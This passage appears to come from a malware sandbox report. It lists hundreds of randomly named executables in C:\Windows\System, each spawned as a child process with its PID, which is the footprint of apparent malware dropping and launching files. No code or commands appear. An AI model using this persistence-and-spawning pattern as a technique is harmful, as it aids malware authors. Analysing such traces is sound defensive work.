  C:\Windows\System\CpBqumf.exe
  2⤵
  PID:7100
- C:\Windows\System\MIJIYlE.exe
  C:\Windows\System\MIJIYlE.exe
  2⤵
  PID:7128
- C:\Windows\System\bKUbAod.exe
  C:\Windows\System\bKUbAod.exe
  2⤵
  PID:6156
- C:\Windows\System\nErWErP.exe
  C:\Windows\System\nErWErP.exe
  2⤵
  PID:400
- C:\Windows\System\XcyZLbo.exe
  C:\Windows\System\XcyZLbo.exe
  2⤵
  PID:6216
- C:\Windows\System\qGQTsud.exe
  C:\Windows\System\qGQTsud.exe
  2⤵
  PID:6244
- C:\Windows\System\rLDRbzg.exe
  C:\Windows\System\rLDRbzg.exe
  2⤵
  PID:6284
- C:\Windows\System\OyJVpiY.exe
  C:\Windows\System\OyJVpiY.exe
  2⤵
  PID:6376
- C:\Windows\System\xVOQeGd.exe
  C:\Windows\System\xVOQeGd.exe
  2⤵
  PID:6424
- C:\Windows\System\cnUCBde.exe
  C:\Windows\System\cnUCBde.exe
  2⤵
  PID:6436
- C:\Windows\System\VafArmO.exe
  C:\Windows\System\VafArmO.exe
  2⤵
  PID:6532
- C:\Windows\System\NIrobVn.exe
  C:\Windows\System\NIrobVn.exe
  2⤵
  PID:6628
- C:\Windows\System\MmOTRlt.exe
  C:\Windows\System\MmOTRlt.exe
  2⤵
  PID:5804
- C:\Windows\System\YTOwAtB.exe
  C:\Windows\System\YTOwAtB.exe
  2⤵
  PID:6720
- C:\Windows\System\SQzQwZv.exe
  C:\Windows\System\SQzQwZv.exe
  2⤵
  PID:6708
- C:\Windows\System\DSEVLbQ.exe
  C:\Windows\System\DSEVLbQ.exe
  2⤵
  PID:6864
- C:\Windows\System\wGHsLjl.exe
  C:\Windows\System\wGHsLjl.exe
  2⤵
  PID:6920
- C:\Windows\System\TrsCUzC.exe
  C:\Windows\System\TrsCUzC.exe
  2⤵
  PID:6964
- C:\Windows\System\hDSikfM.exe
  C:\Windows\System\hDSikfM.exe
  2⤵
  PID:6004
- C:\Windows\System\qTdWJZg.exe
  C:\Windows\System\qTdWJZg.exe
  2⤵
  PID:7012
- C:\Windows\System\wBurRWa.exe
  C:\Windows\System\wBurRWa.exe
  2⤵
  PID:7048
- C:\Windows\System\Xggssuc.exe
  C:\Windows\System\Xggssuc.exe
  2⤵
  PID:7120
- C:\Windows\System\LMKbYVx.exe
  C:\Windows\System\LMKbYVx.exe
  2⤵
  PID:6212
- C:\Windows\System\wiinVOE.exe
  C:\Windows\System\wiinVOE.exe
  2⤵
  PID:6100
- C:\Windows\System\JUsMTRP.exe
  C:\Windows\System\JUsMTRP.exe
  2⤵
  PID:5428
- C:\Windows\System\DFVAMvP.exe
  C:\Windows\System\DFVAMvP.exe
  2⤵
  PID:5392
- C:\Windows\System\SrzBrCI.exe
  C:\Windows\System\SrzBrCI.exe
  2⤵
  PID:6660
- C:\Windows\System\tvVugaS.exe
  C:\Windows\System\tvVugaS.exe
  2⤵
  PID:6832
- C:\Windows\System\vCeIGtd.exe
  C:\Windows\System\vCeIGtd.exe
  2⤵
  PID:3184
- C:\Windows\System\RubUroZ.exe
  C:\Windows\System\RubUroZ.exe
  2⤵
  PID:7112
- C:\Windows\System\qCTxuVS.exe
  C:\Windows\System\qCTxuVS.exe
  2⤵
  PID:6192
- C:\Windows\System\dQtviop.exe
  C:\Windows\System\dQtviop.exe
  2⤵
  PID:6872
- C:\Windows\System\gxYsFjD.exe
  C:\Windows\System\gxYsFjD.exe
  2⤵
  PID:5316
- C:\Windows\System\AifrADf.exe
  C:\Windows\System\AifrADf.exe
  2⤵
  PID:6980
- C:\Windows\System\ZsLLtRF.exe
  C:\Windows\System\ZsLLtRF.exe
  2⤵
  PID:4920
- C:\Windows\System\eroVcWV.exe
  C:\Windows\System\eroVcWV.exe
  2⤵
  PID:7180
- C:\Windows\System\chLBUHn.exe
  C:\Windows\System\chLBUHn.exe
  2⤵
  PID:7228
- C:\Windows\System\OvWdCzv.exe
  C:\Windows\System\OvWdCzv.exe
  2⤵
  PID:7244
- C:\Windows\System\nNlbUaf.exe
  C:\Windows\System\nNlbUaf.exe
  2⤵
  PID:7264
- C:\Windows\System\KRfsbms.exe
  C:\Windows\System\KRfsbms.exe
  2⤵
  PID:7336
- C:\Windows\System\sznbHjf.exe
  C:\Windows\System\sznbHjf.exe
  2⤵
  PID:7372
- C:\Windows\System\anmHCac.exe
  C:\Windows\System\anmHCac.exe
  2⤵
  PID:7392
- C:\Windows\System\ZhrcOcx.exe
  C:\Windows\System\ZhrcOcx.exe
  2⤵
  PID:7412
- C:\Windows\System\lnrhyyb.exe
  C:\Windows\System\lnrhyyb.exe
  2⤵
  PID:7460
- C:\Windows\System\HyVccUj.exe
  C:\Windows\System\HyVccUj.exe
  2⤵
  PID:7484
- C:\Windows\System\qXgIpXN.exe
  C:\Windows\System\qXgIpXN.exe
  2⤵
  PID:7548
- C:\Windows\System\NlgezAo.exe
  C:\Windows\System\NlgezAo.exe
  2⤵
  PID:7568
- C:\Windows\System\adkfUCH.exe
  C:\Windows\System\adkfUCH.exe
  2⤵
  PID:7588
- C:\Windows\System\jDHzJtR.exe
  C:\Windows\System\jDHzJtR.exe
  2⤵
  PID:7604
- C:\Windows\System\VHrwGvl.exe
  C:\Windows\System\VHrwGvl.exe
  2⤵
  PID:7632
- C:\Windows\System\GbZCJfz.exe
  C:\Windows\System\GbZCJfz.exe
  2⤵
  PID:7664
- C:\Windows\System\PHKsURb.exe
  C:\Windows\System\PHKsURb.exe
  2⤵
  PID:7788
- C:\Windows\System\naJpRuK.exe
  C:\Windows\System\naJpRuK.exe
  2⤵
  PID:7820
- C:\Windows\System\uVWuwPY.exe
  C:\Windows\System\uVWuwPY.exe
  2⤵
  PID:7836
- C:\Windows\System\eelMwqq.exe
  C:\Windows\System\eelMwqq.exe
  2⤵
  PID:7856
- C:\Windows\System\fyPMOaV.exe
  C:\Windows\System\fyPMOaV.exe
  2⤵
  PID:7880
- C:\Windows\System\jQNXDOH.exe
  C:\Windows\System\jQNXDOH.exe
  2⤵
  PID:7980
- C:\Windows\System\Boslnxr.exe
  C:\Windows\System\Boslnxr.exe
  2⤵
  PID:7996
- C:\Windows\System\IRVEMKL.exe
  C:\Windows\System\IRVEMKL.exe
  2⤵
  PID:8076
- C:\Windows\System\pPiHsMp.exe
  C:\Windows\System\pPiHsMp.exe
  2⤵
  PID:8096
- C:\Windows\System\QVbFoaI.exe
  C:\Windows\System\QVbFoaI.exe
  2⤵
  PID:8112
- C:\Windows\System\OQKmjEw.exe
  C:\Windows\System\OQKmjEw.exe
  2⤵
  PID:8128
- C:\Windows\System\rZozPMJ.exe
  C:\Windows\System\rZozPMJ.exe
  2⤵
  PID:8144
- C:\Windows\System\SZuAypo.exe
  C:\Windows\System\SZuAypo.exe
  2⤵
  PID:8160
- C:\Windows\System\zYaLAuH.exe
  C:\Windows\System\zYaLAuH.exe
  2⤵
  PID:6944
- C:\Windows\System\hxRdVWD.exe
  C:\Windows\System\hxRdVWD.exe
  2⤵
  PID:7204
- C:\Windows\System\KCRhJyK.exe
  C:\Windows\System\KCRhJyK.exe
  2⤵
  PID:7092
- C:\Windows\System\AzUbsSx.exe
  C:\Windows\System\AzUbsSx.exe
  2⤵
  PID:7324
- C:\Windows\System\zwpioAA.exe
  C:\Windows\System\zwpioAA.exe
  2⤵
  PID:7380
- C:\Windows\System\heuTGky.exe
  C:\Windows\System\heuTGky.exe
  2⤵
  PID:7404
- C:\Windows\System\rubWuxm.exe
  C:\Windows\System\rubWuxm.exe
  2⤵
  PID:7624
- C:\Windows\System\iBdZaRh.exe
  C:\Windows\System\iBdZaRh.exe
  2⤵
  PID:7688
- C:\Windows\System\JxtUuVa.exe
  C:\Windows\System\JxtUuVa.exe
  2⤵
  PID:7704
- C:\Windows\System\aSaMGXm.exe
  C:\Windows\System\aSaMGXm.exe
  2⤵
  PID:7732
- C:\Windows\System\DXdiQED.exe
  C:\Windows\System\DXdiQED.exe
  2⤵
  PID:7752
- C:\Windows\System\wKNuQjl.exe
  C:\Windows\System\wKNuQjl.exe
  2⤵
  PID:7760
- C:\Windows\System\JOvmqcZ.exe
  C:\Windows\System\JOvmqcZ.exe
  2⤵
  PID:7872
- C:\Windows\System\zGcDHhd.exe
  C:\Windows\System\zGcDHhd.exe
  2⤵
  PID:7920
- C:\Windows\System\nBcARjk.exe
  C:\Windows\System\nBcARjk.exe
  2⤵
  PID:7908
- C:\Windows\System\wPSmBHp.exe
  C:\Windows\System\wPSmBHp.exe
  2⤵
  PID:8032
- C:\Windows\System\TdJAitv.exe
  C:\Windows\System\TdJAitv.exe
  2⤵
  PID:7976
- C:\Windows\System\uyccPtj.exe
  C:\Windows\System\uyccPtj.exe
  2⤵
  PID:7928
- C:\Windows\System\ymhCFvE.exe
  C:\Windows\System\ymhCFvE.exe
  2⤵
  PID:8156
- C:\Windows\System\unwJggs.exe
  C:\Windows\System\unwJggs.exe
  2⤵
  PID:8092
- C:\Windows\System\vQfdVRx.exe
  C:\Windows\System\vQfdVRx.exe
  2⤵
  PID:8104
- C:\Windows\System\hZEECdw.exe
  C:\Windows\System\hZEECdw.exe
  2⤵
  PID:7212
- C:\Windows\System\vNtoPqi.exe
  C:\Windows\System\vNtoPqi.exe
  2⤵
  PID:7328
- C:\Windows\System\zhkNuLU.exe
  C:\Windows\System\zhkNuLU.exe
  2⤵
  PID:7812
- C:\Windows\System\ExxiODG.exe
  C:\Windows\System\ExxiODG.exe
  2⤵
  PID:7948
- C:\Windows\System\zzhkqua.exe
  C:\Windows\System\zzhkqua.exe
  2⤵
  PID:8088
- C:\Windows\System\iHvDCRz.exe
  C:\Windows\System\iHvDCRz.exe
  2⤵
  PID:7252
- C:\Windows\System\GOTyoTZ.exe
  C:\Windows\System\GOTyoTZ.exe
  2⤵
  PID:7560
- C:\Windows\System\XBtRMLk.exe
  C:\Windows\System\XBtRMLk.exe
  2⤵
  PID:7728
- C:\Windows\System\cPEtOeN.exe
  C:\Windows\System\cPEtOeN.exe
  2⤵
  PID:7916
- C:\Windows\System\ysNvyOl.exe
  C:\Windows\System\ysNvyOl.exe
  2⤵
  PID:7388
- C:\Windows\System\vzAVbRI.exe
  C:\Windows\System\vzAVbRI.exe
  2⤵
  PID:7720
- C:\Windows\System\rmYgYhQ.exe
  C:\Windows\System\rmYgYhQ.exe
  2⤵
  PID:7296
- C:\Windows\System\XhXbQUU.exe
  C:\Windows\System\XhXbQUU.exe
  2⤵
  PID:8224
- C:\Windows\System\ftOaGhW.exe
  C:\Windows\System\ftOaGhW.exe
  2⤵
  PID:8244
- C:\Windows\System\qtytITF.exe
  C:\Windows\System\qtytITF.exe
  2⤵
  PID:8284
- C:\Windows\System\ImkrqxH.exe
  C:\Windows\System\ImkrqxH.exe
  2⤵
  PID:8316
- C:\Windows\System\iBPLNZo.exe
  C:\Windows\System\iBPLNZo.exe
  2⤵
  PID:8348
- C:\Windows\System\MqQKZaB.exe
  C:\Windows\System\MqQKZaB.exe
  2⤵
  PID:8372
- C:\Windows\System\ONyZGXt.exe
  C:\Windows\System\ONyZGXt.exe
  2⤵
  PID:8396
- C:\Windows\System\reAKvPW.exe
  C:\Windows\System\reAKvPW.exe
  2⤵
  PID:8428
- C:\Windows\System\jfaOtRT.exe
  C:\Windows\System\jfaOtRT.exe
  2⤵
  PID:8448
- C:\Windows\System\FhKlyuX.exe
  C:\Windows\System\FhKlyuX.exe
  2⤵
  PID:8464
- C:\Windows\System\hjphRwg.exe
  C:\Windows\System\hjphRwg.exe
  2⤵
  PID:8484
- C:\Windows\System\BYyGgLx.exe
  C:\Windows\System\BYyGgLx.exe
  2⤵
  PID:8512
- C:\Windows\System\wqybEYr.exe
  C:\Windows\System\wqybEYr.exe
  2⤵
  PID:8572
- C:\Windows\System\pqiJInj.exe
  C:\Windows\System\pqiJInj.exe
  2⤵
  PID:8596
- C:\Windows\System\JBqjmmC.exe
  C:\Windows\System\JBqjmmC.exe
  2⤵
  PID:8616
- C:\Windows\System\jPYcLtL.exe
  C:\Windows\System\jPYcLtL.exe
  2⤵
  PID:8660
- C:\Windows\System\SYAVUYo.exe
  C:\Windows\System\SYAVUYo.exe
  2⤵
  PID:8684
- C:\Windows\System\EgbqeIC.exe
  C:\Windows\System\EgbqeIC.exe
  2⤵
  PID:8704
- C:\Windows\System\amOkupK.exe
  C:\Windows\System\amOkupK.exe
  2⤵
  PID:8724
- C:\Windows\System\OqksOSU.exe
  C:\Windows\System\OqksOSU.exe
  2⤵
  PID:8752
- C:\Windows\System\NNZQcwl.exe
  C:\Windows\System\NNZQcwl.exe
  2⤵
  PID:8776
- C:\Windows\System\zVrrmCE.exe
  C:\Windows\System\zVrrmCE.exe
  2⤵
  PID:8792
- C:\Windows\System\xNXWckU.exe
  C:\Windows\System\xNXWckU.exe
  2⤵
  PID:8808
- C:\Windows\System\gUrmKpk.exe
  C:\Windows\System\gUrmKpk.exe
  2⤵
  PID:8860
- C:\Windows\System\yriSVmt.exe
  C:\Windows\System\yriSVmt.exe
  2⤵
  PID:8892
- C:\Windows\System\ibZmWkb.exe
  C:\Windows\System\ibZmWkb.exe
  2⤵
  PID:8936
- C:\Windows\System\GTghVXQ.exe
  C:\Windows\System\GTghVXQ.exe
  2⤵
  PID:8952
- C:\Windows\System\LPXxNkR.exe
  C:\Windows\System\LPXxNkR.exe
  2⤵
  PID:8972
- C:\Windows\System\MywDWTb.exe
  C:\Windows\System\MywDWTb.exe
  2⤵
  PID:9016
- C:\Windows\System\uqDdPaa.exe
  C:\Windows\System\uqDdPaa.exe
  2⤵
  PID:9032
- C:\Windows\System\yTSJGtN.exe
  C:\Windows\System\yTSJGtN.exe
  2⤵
  PID:9060
- C:\Windows\System\XfuxVWs.exe
  C:\Windows\System\XfuxVWs.exe
  2⤵
  PID:9084
- C:\Windows\System\GShJkJa.exe
  C:\Windows\System\GShJkJa.exe
  2⤵
  PID:9104
- C:\Windows\System\MQmVgPV.exe
  C:\Windows\System\MQmVgPV.exe
  2⤵
  PID:9136
- C:\Windows\System\zxjfLfk.exe
  C:\Windows\System\zxjfLfk.exe
  2⤵
  PID:9168
- C:\Windows\System\TZgsHkz.exe
  C:\Windows\System\TZgsHkz.exe
  2⤵
  PID:9200
- C:\Windows\System\dBlDXwB.exe
  C:\Windows\System\dBlDXwB.exe
  2⤵
  PID:8204
- C:\Windows\System\xRNbKMs.exe
  C:\Windows\System\xRNbKMs.exe
  2⤵
  PID:8276
- C:\Windows\System\OVhPCzI.exe
  C:\Windows\System\OVhPCzI.exe
  2⤵
  PID:8312
- C:\Windows\System\boTvqqv.exe
  C:\Windows\System\boTvqqv.exe
  2⤵
  PID:8420
- C:\Windows\System\zSwRuQt.exe
  C:\Windows\System\zSwRuQt.exe
  2⤵
  PID:8480
- C:\Windows\System\paoKGNy.exe
  C:\Windows\System\paoKGNy.exe
  2⤵
  PID:8492
- C:\Windows\System\JMSDdHf.exe
  C:\Windows\System\JMSDdHf.exe
  2⤵
  PID:8508
- C:\Windows\System\dKsPuLA.exe
  C:\Windows\System\dKsPuLA.exe
  2⤵
  PID:8604
- C:\Windows\System\oXLLdHl.exe
  C:\Windows\System\oXLLdHl.exe
  2⤵
  PID:8760
- C:\Windows\System\WsrjGCF.exe
  C:\Windows\System\WsrjGCF.exe
  2⤵
  PID:8804
- C:\Windows\System\hKZBVSZ.exe
  C:\Windows\System\hKZBVSZ.exe
  2⤵
  PID:8800
- C:\Windows\System\cHBMiEt.exe
  C:\Windows\System\cHBMiEt.exe
  2⤵
  PID:8904
- C:\Windows\System\YiGwsVf.exe
  C:\Windows\System\YiGwsVf.exe
  2⤵
  PID:8960
- C:\Windows\System\jvhXyWW.exe
  C:\Windows\System\jvhXyWW.exe
  2⤵
  PID:9004
- C:\Windows\System\vGVZTcN.exe
  C:\Windows\System\vGVZTcN.exe
  2⤵
  PID:9076
- C:\Windows\System\lIRRfKu.exe
  C:\Windows\System\lIRRfKu.exe
  2⤵
  PID:9164
- C:\Windows\System\VOmEfpm.exe
  C:\Windows\System\VOmEfpm.exe
  2⤵
  PID:9112
- C:\Windows\System\pluOXlM.exe
  C:\Windows\System\pluOXlM.exe
  2⤵
  PID:9196
- C:\Windows\System\CEnkgCe.exe
  C:\Windows\System\CEnkgCe.exe
  2⤵
  PID:8308
- C:\Windows\System\sZUdhvp.exe
  C:\Windows\System\sZUdhvp.exe
  2⤵
  PID:8344
- C:\Windows\System\saKihpY.exe
  C:\Windows\System\saKihpY.exe
  2⤵
  PID:8540
- C:\Windows\System\yMrczvX.exe
  C:\Windows\System\yMrczvX.exe
  2⤵
  PID:8720
- C:\Windows\System\knVxztw.exe
  C:\Windows\System\knVxztw.exe
  2⤵
  PID:8988
- C:\Windows\System\XaixIcz.exe
  C:\Windows\System\XaixIcz.exe
  2⤵
  PID:9068
- C:\Windows\System\FYAmFla.exe
  C:\Windows\System\FYAmFla.exe
  2⤵
  PID:9144
- C:\Windows\System\PQeOeQZ.exe
  C:\Windows\System\PQeOeQZ.exe
  2⤵
  PID:8068
- C:\Windows\System\eoIcyda.exe
  C:\Windows\System\eoIcyda.exe
  2⤵
  PID:9008
- C:\Windows\System\niHvodZ.exe
  C:\Windows\System\niHvodZ.exe
  2⤵
  PID:7740
- C:\Windows\System\VhXKVvM.exe
  C:\Windows\System\VhXKVvM.exe
  2⤵
  PID:9252
- C:\Windows\System\VnqPyLQ.exe
  C:\Windows\System\VnqPyLQ.exe
  2⤵
  PID:9292
- C:\Windows\System\YePabcq.exe
  C:\Windows\System\YePabcq.exe
  2⤵
  PID:9316
- C:\Windows\System\sjpaKPV.exe
  C:\Windows\System\sjpaKPV.exe
  2⤵
  PID:9340
- C:\Windows\System\DKClEbr.exe
  C:\Windows\System\DKClEbr.exe
  2⤵
  PID:9364
- C:\Windows\System\LCatHPs.exe
  C:\Windows\System\LCatHPs.exe
  2⤵
  PID:9384
- C:\Windows\System\qeQQCOM.exe
  C:\Windows\System\qeQQCOM.exe
  2⤵
  PID:9412
- C:\Windows\System\wZnOzMZ.exe
  C:\Windows\System\wZnOzMZ.exe
  2⤵
  PID:9440
- C:\Windows\System\krvQZAh.exe
  C:\Windows\System\krvQZAh.exe
  2⤵
  PID:9476
- C:\Windows\System\JqJsbSr.exe
  C:\Windows\System\JqJsbSr.exe
  2⤵
  PID:9504
- C:\Windows\System\vatMwGD.exe
  C:\Windows\System\vatMwGD.exe
  2⤵
  PID:9528
- C:\Windows\System\PLjCWxp.exe
  C:\Windows\System\PLjCWxp.exe
  2⤵
  PID:9564
- C:\Windows\System\rDLLZCm.exe
  C:\Windows\System\rDLLZCm.exe
  2⤵
  PID:9580
- C:\Windows\System\DByBwCz.exe
  C:\Windows\System\DByBwCz.exe
  2⤵
  PID:9616
- C:\Windows\System\zStNFYr.exe
  C:\Windows\System\zStNFYr.exe
  2⤵
  PID:9640
- C:\Windows\System\cvQCsed.exe
  C:\Windows\System\cvQCsed.exe
  2⤵
  PID:9656
- C:\Windows\System\mvxBIEd.exe
  C:\Windows\System\mvxBIEd.exe
  2⤵
  PID:9684
- C:\Windows\System\RdIVhAI.exe
  C:\Windows\System\RdIVhAI.exe
  2⤵
  PID:9700
- C:\Windows\System\qNxYRiN.exe
  C:\Windows\System\qNxYRiN.exe
  2⤵
  PID:9720
- C:\Windows\System\dzoNBFt.exe
  C:\Windows\System\dzoNBFt.exe
  2⤵
  PID:9776
- C:\Windows\System\dPnOfjT.exe
  C:\Windows\System\dPnOfjT.exe
  2⤵
  PID:9796
- C:\Windows\System\dznXHYC.exe
  C:\Windows\System\dznXHYC.exe
  2⤵
  PID:9816
- C:\Windows\System\MtsHPpm.exe
  C:\Windows\System\MtsHPpm.exe
  2⤵
  PID:9844
- C:\Windows\System\fDYYpJR.exe
  C:\Windows\System\fDYYpJR.exe
  2⤵
  PID:9888
- C:\Windows\System\ueBppDi.exe
  C:\Windows\System\ueBppDi.exe
  2⤵
  PID:9908
- C:\Windows\System\AWdJOJp.exe
  C:\Windows\System\AWdJOJp.exe
  2⤵
  PID:9968
- C:\Windows\System\RCRKOkX.exe
  C:\Windows\System\RCRKOkX.exe
  2⤵
  PID:9988
- C:\Windows\System\AKQUoVx.exe
  C:\Windows\System\AKQUoVx.exe
  2⤵
  PID:10004
- C:\Windows\System\YOBTFOu.exe
  C:\Windows\System\YOBTFOu.exe
  2⤵
  PID:10044
- C:\Windows\System\KydQWJI.exe
  C:\Windows\System\KydQWJI.exe
  2⤵
  PID:10076
- C:\Windows\System\eOOkbJY.exe
  C:\Windows\System\eOOkbJY.exe
  2⤵
  PID:10116
- C:\Windows\System\wIELyoh.exe
  C:\Windows\System\wIELyoh.exe
  2⤵
  PID:10132
- C:\Windows\System\eppnYkq.exe
  C:\Windows\System\eppnYkq.exe
  2⤵
  PID:10152
- C:\Windows\System\qXsrsfr.exe
  C:\Windows\System\qXsrsfr.exe
  2⤵
  PID:10168
- C:\Windows\System\YOyoLxL.exe
  C:\Windows\System\YOyoLxL.exe
  2⤵
  PID:10200
- C:\Windows\System\rrwtLPw.exe
  C:\Windows\System\rrwtLPw.exe
  2⤵
  PID:10232
- C:\Windows\System\XbgXgFH.exe
  C:\Windows\System\XbgXgFH.exe
  2⤵
  PID:8584
- C:\Windows\System\JrHBcfE.exe
  C:\Windows\System\JrHBcfE.exe
  2⤵
  PID:9268
- C:\Windows\System\lfbwywL.exe
  C:\Windows\System\lfbwywL.exe
  2⤵
  PID:9312
- C:\Windows\System\GSTvufV.exe
  C:\Windows\System\GSTvufV.exe
  2⤵
  PID:9356
- C:\Windows\System\gqPkLcX.exe
  C:\Windows\System\gqPkLcX.exe
  2⤵
  PID:9404
- C:\Windows\System\zKPYzJr.exe
  C:\Windows\System\zKPYzJr.exe
  2⤵
  PID:9452
- C:\Windows\System\bgxhCYZ.exe
  C:\Windows\System\bgxhCYZ.exe
  2⤵
  PID:9588
- C:\Windows\System\tAVzaJd.exe
  C:\Windows\System\tAVzaJd.exe
  2⤵
  PID:9676
- C:\Windows\System\ykWvGWu.exe
  C:\Windows\System\ykWvGWu.exe
  2⤵
  PID:9716
- C:\Windows\System\eTEemuT.exe
  C:\Windows\System\eTEemuT.exe
  2⤵
  PID:9824
- C:\Windows\System\FhcHrVc.exe
  C:\Windows\System\FhcHrVc.exe
  2⤵
  PID:9784
- C:\Windows\System\vsAoAoX.exe
  C:\Windows\System\vsAoAoX.exe
  2⤵
  PID:9980
- C:\Windows\System\iDzLLRV.exe
  C:\Windows\System\iDzLLRV.exe
  2⤵
  PID:10020
- C:\Windows\System\UNBPKgD.exe
  C:\Windows\System\UNBPKgD.exe
  2⤵
  PID:10124
- C:\Windows\System\igRNxJK.exe
  C:\Windows\System\igRNxJK.exe
  2⤵
  PID:10160
- C:\Windows\System\wifDTbC.exe
  C:\Windows\System\wifDTbC.exe
  2⤵
  PID:10188
- C:\Windows\System\uvjZXaM.exe
  C:\Windows\System\uvjZXaM.exe
  2⤵
  PID:10228
- C:\Windows\System\PxmjZNu.exe
  C:\Windows\System\PxmjZNu.exe
  2⤵
  PID:8888
- C:\Windows\System\ANGOFtP.exe
  C:\Windows\System\ANGOFtP.exe
  2⤵
  PID:9524
- C:\Windows\System\aAuQkkp.exe
  C:\Windows\System\aAuQkkp.exe
  2⤵
  PID:9636
- C:\Windows\System\XiPWVfw.exe
  C:\Windows\System\XiPWVfw.exe
  2⤵
  PID:9788
- C:\Windows\System\GWXzJcP.exe
  C:\Windows\System\GWXzJcP.exe
  2⤵
  PID:9996
- C:\Windows\System\nDtRKEz.exe
  C:\Windows\System\nDtRKEz.exe
  2⤵
  PID:10096
- C:\Windows\System\KUabFJk.exe
  C:\Windows\System\KUabFJk.exe
  2⤵
  PID:10140
- C:\Windows\System\MQqnfpv.exe
  C:\Windows\System\MQqnfpv.exe
  2⤵
  PID:9308
- C:\Windows\System\acVMBPd.exe
  C:\Windows\System\acVMBPd.exe
  2⤵
  PID:9576
- C:\Windows\System\gaMWOEC.exe
  C:\Windows\System\gaMWOEC.exe
  2⤵
  PID:10148
- C:\Windows\System\xppTmpO.exe
  C:\Windows\System\xppTmpO.exe
  2⤵
  PID:10244
- C:\Windows\System\jbsPwVK.exe
  C:\Windows\System\jbsPwVK.exe
  2⤵
  PID:10268
- C:\Windows\System\jDCmnVq.exe
  C:\Windows\System\jDCmnVq.exe
  2⤵
  PID:10292
- C:\Windows\System\MfDTOfY.exe
  C:\Windows\System\MfDTOfY.exe
  2⤵
  PID:10348
- C:\Windows\System\LeEALjR.exe
  C:\Windows\System\LeEALjR.exe
  2⤵
  PID:10384
- C:\Windows\System\RyInbqW.exe
  C:\Windows\System\RyInbqW.exe
  2⤵
  PID:10404
- C:\Windows\System\HuzNPhD.exe
  C:\Windows\System\HuzNPhD.exe
  2⤵
  PID:10456
- C:\Windows\System\FckKbtV.exe
  C:\Windows\System\FckKbtV.exe
  2⤵
  PID:10476
- C:\Windows\System\mnMuTix.exe
  C:\Windows\System\mnMuTix.exe
  2⤵
  PID:10496
- C:\Windows\System\FEAkPdC.exe
  C:\Windows\System\FEAkPdC.exe
  2⤵
  PID:10520
- C:\Windows\System\oIMamqm.exe
  C:\Windows\System\oIMamqm.exe
  2⤵
  PID:10536
- C:\Windows\System\KkXkPmy.exe
  C:\Windows\System\KkXkPmy.exe
  2⤵
  PID:10556
- C:\Windows\System\BTexSyE.exe
  C:\Windows\System\BTexSyE.exe
  2⤵
  PID:10616
- C:\Windows\System\wEnrDmK.exe
  C:\Windows\System\wEnrDmK.exe
  2⤵
  PID:10644
- C:\Windows\System\aYFUErv.exe
  C:\Windows\System\aYFUErv.exe
  2⤵
  PID:10668
- C:\Windows\System\JcVmBWE.exe
  C:\Windows\System\JcVmBWE.exe
  2⤵
  PID:10684
- C:\Windows\System\fOaoAFk.exe
  C:\Windows\System\fOaoAFk.exe
  2⤵
  PID:10704
- C:\Windows\System\inDGRAc.exe
  C:\Windows\System\inDGRAc.exe
  2⤵
  PID:10724
- C:\Windows\System\BQPWtwg.exe
  C:\Windows\System\BQPWtwg.exe
  2⤵
  PID:10744
- C:\Windows\System\EGewqDM.exe
  C:\Windows\System\EGewqDM.exe
  2⤵
  PID:10800
- C:\Windows\System\rZBsqII.exe
  C:\Windows\System\rZBsqII.exe
  2⤵
  PID:10820
- C:\Windows\System\vNXUdXp.exe
  C:\Windows\System\vNXUdXp.exe
  2⤵
  PID:10840
- C:\Windows\System\lMKCPut.exe
  C:\Windows\System\lMKCPut.exe
  2⤵
  PID:10856
- C:\Windows\System\CPtaIua.exe
  C:\Windows\System\CPtaIua.exe
  2⤵
  PID:10872
- C:\Windows\System\kaHLTLb.exe
  C:\Windows\System\kaHLTLb.exe
  2⤵
  PID:10892
- C:\Windows\System\lnYSGmR.exe
  C:\Windows\System\lnYSGmR.exe
  2⤵
  PID:10980
- C:\Windows\System\BrebTit.exe
  C:\Windows\System\BrebTit.exe
  2⤵
  PID:11004
- C:\Windows\System\mckoWaX.exe
  C:\Windows\System\mckoWaX.exe
  2⤵
  PID:11024
- C:\Windows\System\qDtBwtj.exe
  C:\Windows\System\qDtBwtj.exe
  2⤵
  PID:11076
- C:\Windows\System\NlMVfDB.exe
  C:\Windows\System\NlMVfDB.exe
  2⤵
  PID:11096
- C:\Windows\System\cmOqJxv.exe
  C:\Windows\System\cmOqJxv.exe
  2⤵
  PID:11112
- C:\Windows\System\iCnAiDt.exe
  C:\Windows\System\iCnAiDt.exe
  2⤵
  PID:11144
- C:\Windows\System\PhVlbXk.exe
  C:\Windows\System\PhVlbXk.exe
  2⤵
  PID:11160
- C:\Windows\System\iqnGWWm.exe
  C:\Windows\System\iqnGWWm.exe
  2⤵
  PID:11196
- C:\Windows\System\QLDbOus.exe
  C:\Windows\System\QLDbOus.exe
  2⤵
  PID:11224
- C:\Windows\System\TCPdNBz.exe
  C:\Windows\System\TCPdNBz.exe
  2⤵
  PID:11260
- C:\Windows\System\izowKRg.exe
  C:\Windows\System\izowKRg.exe
  2⤵
  PID:9348
- C:\Windows\System\ulRjBfz.exe
  C:\Windows\System\ulRjBfz.exe
  2⤵
  PID:10260
- C:\Windows\System\OnSWTcn.exe
  C:\Windows\System\OnSWTcn.exe
  2⤵
  PID:10344
- C:\Windows\System\ktMqtwL.exe
  C:\Windows\System\ktMqtwL.exe
  2⤵
  PID:10464
- C:\Windows\System\zvuSdST.exe
  C:\Windows\System\zvuSdST.exe
  2⤵
  PID:10448
- C:\Windows\System\gQOdmjj.exe
  C:\Windows\System\gQOdmjj.exe
  2⤵
  PID:10600
- C:\Windows\System\ISYJUxY.exe
  C:\Windows\System\ISYJUxY.exe
  2⤵
  PID:10628
- C:\Windows\System\HcHCrqI.exe
  C:\Windows\System\HcHCrqI.exe
  2⤵
  PID:10664
- C:\Windows\System\gGMUhtF.exe
  C:\Windows\System\gGMUhtF.exe
  2⤵
  PID:10732
- C:\Windows\System\ClnjXaY.exe
  C:\Windows\System\ClnjXaY.exe
  2⤵
  PID:10764
- C:\Windows\System\lppGeYu.exe
  C:\Windows\System\lppGeYu.exe
  2⤵
  PID:10780
- C:\Windows\System\AZkqjam.exe
  C:\Windows\System\AZkqjam.exe
  2⤵
  PID:10812
- C:\Windows\System\XYqIXpW.exe
  C:\Windows\System\XYqIXpW.exe
  2⤵
  PID:10996
- C:\Windows\System\ciinLwa.exe
  C:\Windows\System\ciinLwa.exe
  2⤵
  PID:10932
- C:\Windows\System\BZGRnNy.exe
  C:\Windows\System\BZGRnNy.exe
  2⤵
  PID:11020
- C:\Windows\System\Ltspiww.exe
  C:\Windows\System\Ltspiww.exe
  2⤵
  PID:11104
- C:\Windows\System\eQWLtHp.exe
  C:\Windows\System\eQWLtHp.exe
  2⤵
